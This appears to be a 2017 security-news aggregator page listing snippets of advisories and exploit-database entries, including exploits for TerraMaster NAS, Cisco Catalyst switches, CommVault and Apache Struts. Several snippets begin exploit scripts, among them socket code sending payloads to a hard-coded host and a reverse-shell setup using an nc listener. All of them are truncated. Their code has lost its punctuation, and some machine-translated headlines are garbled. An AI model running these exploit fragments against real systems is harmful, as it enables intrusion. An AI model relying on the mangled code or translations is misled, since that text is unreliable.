Oracle Human Resources Management System PeopleSoft unauthorized remote code execution vulnerability parsing-vulnerability warning-the black bar safety net

! A few months ago, I had the privilege of participating in several of Oracle's PeopleSoft construction project Safety Audit, the audit object mainly for the PeopleSoft series of Human Resources Management System, HRMS, and development tools package PeopleTool it. Throughout the online on the...

TerraMaster F2-420 NAS TOS 3.0.30 - Unauthenticated Remote Code Execution as Root Exploit

Exploit for php platform in category web applications Source: https://www.evilsocket.net/2017/05/30/Terramaster-NAS-Unauthenticated-RCE-as-root/ !/usr/bin/python coding: utf8 Exploit: Unauthenticated RCE as root. Vendor: TerraMaster Product: TOS import sys import requests def upload address, port...

MobaXtrem 10.2 Remote Code Execution

''' Exploit Title: MobaXtrem 10.2 telnet Server Remote Code Execution Date: 15/5/2017 Exploit Author: Sultan Albalawi Software Link: http://download.mobatek.net/10220170312132617/MobaXtermPortablev10.2.zip Version: 10.2 Tested on: win7 CVE : n/n video:...

CVE-2017-0199: analysis Microsoft Office RTF vulnerability-vulnerability warning-the black bar safety net

FireEye recently detected using CVE-2017-0199 security vulnerabilities malicious Microsoft Office RTF document, be aware of CVE-2017-0199, but had not been disclosed vulnerability. When the user opens that contains the exploit Code of the document, the malicious code will download and execute the...

CVE-2017-3881: Cisco Catalyst switches remote code execution vulnerability analysis-vulnerability warning-the black bar safety net

Your Catalyst switches whether to enable the telnet in? If Yes, it would have to be careful. This article will be to introduce the reader for the equipped with the latest firmware the Catalyst 2960 switch the remote code execution vulnerability proof-of-concept attack technique. Specific exploit...

Cisco Catalyst 2960 IOS 12.2(55)SE1 - 'ROCEM' Remote Code Execution

!/usr/bin/python Author: Artem Kondratenko @artkond import socket import sys from time import sleep setcredless = True if lensys.argv 3: print sys.argv0 + ' host --set/--unset' sys.exit elif sys.argv2 == '--unset': setcredless = False elif sys.argv2 == '--set': pass else: print sys.argv0 + ' host...

CVE-2017-2482

creationtimestamp| type| source ---|---|--- 2017-04-04 00:00:00+00:00| exploited| https://www.exploit-db.com/exploits/41796...

“Dishwasher”was traced to a directory traversal vulnerability, an IOT security is getting worse and worse-vulnerability warning-the black bar safety net

Although the IOT the number of devices increases exponentially, but these smart devices security level has not increased, the user still faces a high cyber-attack risk. Miele Miele was founded in Germany one hundred years of home appliance brand, recently one model for PG8528 networked medical...

Internet-Connected Medical Washer-Disinfector Found Vulnerable to Hacking

Internet-of-Things devices are turning every industry into the computer industry, making customers think that their lives would be much easier with smart devices. There are, of course, some really good reasons to connect certain devices to the Internet. For example, remotely switching on your A/C...

Windows DVD Maker 6.1.7 XXE Injection

Credits: John Page AKA hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-DVD-MAKER-XML-EXTERNAL-ENTITY-FILE-DISCLOSURE.txt + ISR: ApparitionSec Vendor: ================= www.microsoft.com Product: ================= Windows DVD Maker...

CommVault Edge 11 SP6 - Stack Buffer Overflow (PoC)

import socket import binascii import time import struct s = socket.socketsocket.AFINET, socket.SOCKSTREAM s.settimeout1 s.connect"10.101.0.85", 8400 def srp=None, r=None: if p: print "sending %d bytes: %s " % lenp/2,p payl = binascii.a2bhexp s.sendpayl if r: data = s.recv10242 print "received %d...

WordPress REST API Bug Could Be Used in Stored XSS Attacks

The recently patched WordPress REST API Endpoint vulnerability is the gift that keeps on giving. Already responsible for more than one million website defacements and attempts to monetize some of those attacks, the flaw also opens the door to a separate attack. Researchers at Sucuri who found the...

Cerberus FTP Server 8.0.10.1 - Denial of Service

Cerberus FTP Server 8.0.10.1 - Denial of Service Exploit Title: Cerberus FTP server – Denial of Service Date: 2017-03-13 Exploit Author: Peter Baris Vendor Homepage: https://www.cerberusftp.com/ Software Link: download link if available Version: 8.0.10.1 Tested on: Windows Server 2008 R2 Standard...

Exploit for Improper Handling of Exceptional Conditions in Apache Struts

CVE-2017-5638 PoC Code in Python | DORK: ext:action Example Po...

Apache Struts 2 2.3.x / 2.5.x Remote Code Execution

CVE-2017-5638 Apache Struts 2 Vulnerability Remote Code Execution Reverse shell from target Author: anarc0der - github.com/anarcoder Tested with tomcat8 Install tomcat8 Deploy WAR file https://github.com/nixawk/labs/tree/master/CVE-2017-5638 Ex: Open: $ nc -lnvp 4444 python2 struntsrce.py...

Linux kernel local privilege escalation flaw in n_hdlc（CVE-2017-2636）

This article discloses the exploitation of CVE-2017-2636, which is a race condition in the nhdlc Linux kernel driver drivers/tty/nhdlc.c. The described exploit gains root privileges bypassing Supervisor Mode Execution Protection SMEP. This driver provides HDLC serial line discipline and comes as ...

USBPcap 1.1.0.0 (WireShark 2.2.5) - Local Privilege Escalation

/ Exploit Title - USBPcap Null Pointer Dereference Privilege Escalation Date - 07th March 2017 Discovered by - Parvez Anwar @parvezghh Vendor Homepage - http://desowin.org/usbpcap/ Tested Version - 1.1.0.0 USB Packet capture for Windows bundled with WireShark 2.2.5 Driver Version - 1.1.0.0 -...

MikroTik Router Denial Of Service | ARP Table OverFlow Exploit

Exploit for hardware platform in category dos / poc CVE:2017-6444 Exploit Title: MikroTik Router Denial Of Service | ARP Table OverFlow Exploit Author: Hosein Askari FarazPajohan Vendor HomePage: https://mikrotik.com/ Series : Hap Lite Tested on: Parrot Security OS Date: 03-3-2017 Category: Netwo...

Unpatched SMB Zero Day Easily Exploitable

In what’s turning out to be the zero day that keeps on giving, researchers are still finding ways to exploit an unpatched denial of service vulnerability that exists in the way Windows implements the Server Message Block protocol. Details around the bug aren’t a mystery. Laurent Gaffié, the...

Microsoft releases update for Flash Player, but leaves two disclosed Flaws Unpatched

Microsoft on Tuesday released security update KB 4010250 to patch flaws in Adobe Flash Player for its customers using Internet Explorer on Windows 8.1 and later, as well as Edge for Windows 10, but two already disclosed flaws remain unpatched. Just last week, Microsoft announced that its February...